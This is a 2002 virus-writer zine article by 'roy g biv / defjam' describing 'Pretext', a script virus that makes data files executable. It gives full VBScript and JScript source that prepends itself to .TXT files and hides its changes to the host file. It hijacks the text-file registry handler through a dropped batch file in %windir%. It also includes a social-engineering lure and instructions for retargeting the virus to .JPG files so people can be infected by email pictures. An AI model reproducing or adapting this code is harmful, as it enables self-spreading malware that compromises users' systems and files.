Replication from data files roy g biv / defjam -= defjam =- since 1992 bringing you the viruses of tomorrow today! About the author: Former DOS/Win16 virus writer, author of several virus families, including Ginger (see Coderz #1 zine for terrible buggy example, contact me for better sources ;), and Virus Bulletin 9/95 for a description of what they called Rainbow. Co-author of world's first virus using circular partition trick (Orsam, coded with Prototype in 1993). Designer of world's first XMS swapping virus (John Galt, coded by RT Fishel in 1995, only 30 bytes stub, the rest is swapped out). Author of world's first virus using Thread Local Storage for replication (Shrug, see Virus Bulletin 6/02 for a description, but they call it Chiton), world's first virus using Visual Basic 5/6 language extensions for replication (OU812), world's first Native executable virus (Chthon), world's first virus using process co-operation to prevent termination (Gemini), and world's first virus using polymorphic SMTP headers (Junkmail). Author of various retrovirus articles (eg see Vlad #7 for the strings that make your code invisible to TBScan). Went to sleep for a number of years. This is my first virus for VBScript and JScript. They are the world's first viruses that can convert any data files to infectable objects. Code and Data Executable files are, obviously, directly executable. This also means that code added to these files can be executed directly. Can the same thing be done for data files? No. That is why they are called data files. :) However, what can be done is to change the environment so that data files become executable files. Then code can be added to these files that can be executed directly. First attempt Let us decide to infect .TXT files. We can change the environment to run .TXT files as executable binary files, by dropping an additional executable binary file and changing the registry to run this file instead. This file calls WinExec() to run the .TXT file as executable binary code. There is a serious problem with this method. The problem is that not-infected files can crash the computer when the text is run as binary code. Second attempt We must use a different type of code and a different way to run it. The code type is text, and the way to run it is as .BAT or *Script (either VBScript or JScript). If we think about .BAT, then we know immediately that .BAT is not good because it has a 64kb limit. So the answer is *Script. If we prepend a script to .TXT files, then we can change the environment to use the Windows Scripting Host to run the script and no need for additional file. What about clean files? They are still a problem, but now the problem is different. If we try to run a clean file, then the computer will not crash, only the clean file will not be displayed anymore. Only infected files can be displayed. Also, new files cannot be created and existing files cannot be altered. Third attempt We can solve this problem by using the additional file again. The additional file can be binary or .BAT or *Script file. That file will use the Windows Scripting Host to try to run the .TXT file as a script, then to display the file as usual. All of those problems are solved. If the file is infected, then our code will clean the host so it will display correctly. If the file is clean already, then it will also display correctly. The technique can be applied to any file type with only a few changes to the code. Only one problem remains: how can we prepend a script to any other file without causing scripting errors? Final attempt The solution to this problem is what I call "tar-script". :) Microsoft's scripting engines calculate the length of a script by using strlen() function. This means that when a 0 is found, no more file is examined, so if our script ends with a 0 then we can append anything to it and no errors will happen. Using the prepending technique is unique because even if our additional file is deleted, our code can still be run from the data files, only it requires user support. If user runs the file using WSH or renames the extension to the scripting language that we use, then we become virus again. Place comment on first line: "This is config file. Run cscript //e:xxx to configure your system" and replace xxx with "vbs" or "jscript", depending on the language. ;) But what happens if the clean file contains a viral script? Heh, it runs. Let's see the code. It requires WSH v5.1+ because we must specify the engine to use. First is VBScript version. 'Pretext - roy g biv 24/06/02 set a=createobject("scripting.filesystemobject") b=wscript.scriptfullname 'no dim needed for local variables on error resume next set c=a.opentextfile(b) 'open host d=c.read(996) 'read virus code. 996 is size of virus with no comments or spaces set e=a.getfile(b) 'get our file object f=c.read(e.size-996) 'read rest of host file 'if you change the size of code, then you must change both of these values c=e.attributes 'save attributes e.attributes=0 'remove any read-only attribute set g=a.opentextfile(b,2) 'open host for writing if err.number=0then g.write f 'restore host. is world's first full stealth script virus? ;) end if e.attributes=c 'restore attributes set c=a.getfolder(".") 'demo version, current directory only for each e in c.files if b<>e and lcase(a.getextensionname(e))="txt"then 'this can be changed to any extension 'and see below for registry key to change err=0 set f=a.opentextfile(e,1) 'open potential victim if err.number=0then g=f.read(1) 'read first character if g<>"'"then 'check for infection marker h=f.readall 'read entire file i=e.attributes 'save attributes e.attributes=0 'remove any read-only attribute err=0 set j=a.opentextfile(e,2) 'open file for writing if err.number=0then j.write d+g+h 'prepend to file j.close 'close file (write mode) end if e.attributes=i 'restore attributes end if f.close 'close file (read mode) end if end if next set b=createobject("wscript.shell") c="HKLM" d="\software\classes\txtfile\shell\open\command\" e=b.regread(c+d) 'read current handler f="pretext.bat" g=f+" %1" if e<>g then 'check for infected environment h=a.getspecialfolder(0) '%windir% if right(h,1)<>"\"then h=h+"\" 'add \ if required end if a.opentextfile(h+f,2,1).write"@cscript %1 //e:vbs //b //nologo"+vbcr+vblf+"@"+e 'create and write our additional file in %windir% 'more stealth: original handler will be used to display file b.regwrite c+d,g 'alter registry to infect environment b.regwrite"HKCU"+d,g 'Windows 2000/XP look in HKCU before HKLM 'so we alter that key, too end if <0 here> Now is JScript version. //Pretext - roy g biv 24/06/02 a=new ActiveXObject("scripting.filesystemobject") try { c=a.opentextfile(b=WScript.scriptfullname) //open host d=c.read(944) //read virus code. 944 is size of virus with no comments or spaces e=a.getfile(b) //get our file object f=c.read(e.size-944) //read rest of host file //if you change the size of code, then you must change both of these values c=e.attributes //save attributes e.attributes=0 //remove any read-only attribute a.opentextfile(b,2).write(f) //open and write host //if VBS version is first full stealth script then this is second ;) e.attributes=c //restore attributes } catch(z) { } for(c=new Enumerator(a.getfolder(".").files);!c.atEnd();c.moveNext()) //demo version, current directory only { e=c.item() if(b!=e&&a.getextensionname(e).toLowerCase()=="txt") //this can be changed to any extension //and see below for registry key to change try { f=a.opentextfile(e,1) //open potential victim g=f.read(1) //read first character, keep for later if(g!="/") //check for infection marker try { h=f.readall() //read entire file i=e.attributes //save attributes e.attributes=0 //remove any read-only attribute j=a.opentextfile(e,2) //open file for writing j.write(d+g+h) //prepend to file, append first character and host j.close() //close file (write mode) e.attributes=i //restore attributes } catch(z) { } f.close() //close file (read mode) } catch(z) { } } b=new ActiveXObject("wscript.shell") c="HKLM" d="\\software\\classes\\txtfile\\shell\\open\\command\\" e=b.regread(c+d) //read current handler f="pretext.bat" g=f+" %1" if(e!=g) //check for infected environment { h=a.getabsolutepathname(a.getspecialfolder(0)) //%windir% if(h.charAt(h.length-1)!="\\") h+="\\" //add \ if required a.opentextfile(h+f,2,1).write("@cscript %1 //e:jscript //b //nologo\r\n@"+e) //create and write our additional file in %windir% //more stealth: original handler will be used to display file b.regwrite(c+d,g) //alter registry to infect environment b.regwrite("HKCU"+d,g) //Windows 2000/XP look in HKCU before HKLM //so we alter that key, too } <0 here> Now let us decide to infect .JPG files instead of .TXT files. How to do that? Simply change the extension from "txt" to "jpg" then change the registry key from 'txtfile' to 'jpegfile'. We must also increase the size of code by 1 byte because 'jpegfile' is 1 byte larger than 'txtfile'. That's all. We infect .JPG files, we replicate from .JPG files and they still display on an infected computer. Make dropper by renaming extension. After run, rename to .JPG. So now you can infect people by sending a picture file. Greets to: RT Fishel what will we do next? VirusBuster hoping for 29A#7 :) Ultras waiting for MTX#4 ;) Prototype see you in the next life The Gingerbread Man ...actus rium non facit nici. mens ria sit rgb/defjam jun 2002 iam_rgb@hotmail.com